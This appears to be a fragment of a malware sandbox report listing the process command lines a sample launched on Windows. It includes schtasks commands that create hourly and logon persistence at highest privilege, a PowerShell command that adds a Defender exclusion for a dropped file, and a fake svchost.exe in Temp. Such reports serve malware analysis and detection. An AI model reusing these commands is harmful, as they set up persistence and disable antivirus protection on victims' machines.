"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6098613852097135989,12193692332369972990,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\New.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

Network

Country Destination Domain Proto

Files
